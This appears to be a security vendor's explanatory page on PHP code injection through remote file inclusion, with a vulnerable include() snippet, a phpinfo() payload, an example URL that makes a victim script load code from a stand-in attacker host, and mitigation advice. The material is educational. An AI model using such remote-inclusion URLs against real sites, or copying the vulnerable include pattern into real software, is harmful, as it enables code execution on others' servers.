DefenseCode

PHP Code Injection

Risk type:HIGH

Description:

PHP code injection vulnerability allows the attacker to insert malicious PHP code straight into a program/script from some outside source. Added code is a part of the application itself with the same permissions as application.

Example:

Let's assume that the PHP script named "script.php" could be found on the following link:

http://www.victim.com/script.php

The page has the following vulnerable code:

... html header ...
<?php
include ('$page');
?>
... html footer ...

The attacker could have a malicious code script ("malicious.php") on some website:

http://www.attacker.com/malicious.php

Code within that script, that the attacker wants to inject, could look like:

<?php
phpinfo();
?>

The attacker could inject malicious code using the following URL in a browser:

http://www.victim.com/script.php?page=http://www.attacker.com/malicious.php

The end result would have exploited website execute the command phpinfo() within the "script.php".

Mitigation:

  • Proper input variables validation.
  • Use a whitelist of acceptable inputs that strictly conform to specifications.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules.
  • Check for invalid characters and set up all the page files in a separate directory.
  • Use library calls rather than external processes to recreate the desired functionality.

Further reading:

https://www.owasp.org/index.php/Code_Injection